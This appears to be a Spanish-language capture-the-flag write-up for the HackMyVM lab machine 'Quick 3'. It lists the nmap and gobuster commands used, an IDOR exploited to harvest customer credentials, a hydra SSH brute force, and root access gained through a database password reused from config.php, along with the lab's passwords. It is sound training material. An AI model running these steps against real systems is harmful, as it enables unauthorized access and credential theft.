cd ~/blog

~/writeups/hmv/107-quick-3.md

107 - Quick 3

easy Linux hmv 04-06-2024
IDOR (Insecure Direct Object Reference)SSH credential brute forceconfig.php password reuse
hackmyvm.eu/machines/machine.php?vm=Quick3

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.17
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 23:25 -04
Nmap scan report for 192.168.1.17
Host is up (0.00031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Quick Automative - Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 gobuster dir -u 'http://192.168.1.17' -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,gif,zip -r
...
/customer             (Status: 200) [Size: 2175]
...

En /customer nos registramos una cuenta. En "My Profile" el ID del usuario se carga en la URL, lo que delata un IDOR: iterando el ID recolectamos usuarios y contraseñas de todos los clientes, y los usamos para fuerza bruta SSH:

 hydra -L users.txt -P passwd.txt 192.168.112.58 ssh -t 64
...
[22][ssh] host: 192.168.112.58   login: mike   password: 6G3UCx6aH6UYvJ6m
...

Entramos por SSH como mike y obtenemos la primera flag. Para escalar, el config.php revela la contraseña de la BD, reutilizada por root:

mike@quick3:/var/www/html/customer$ cat config.php
<?php
// config.php
$conn = new mysqli('localhost', 'root', 'fastandquicktobefaster', 'quick');
...
?>
mike@quick3:/var/www/html/customer$ su root
Password: fastandquicktobefaster
root@quick3:/var/www/html/customer#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados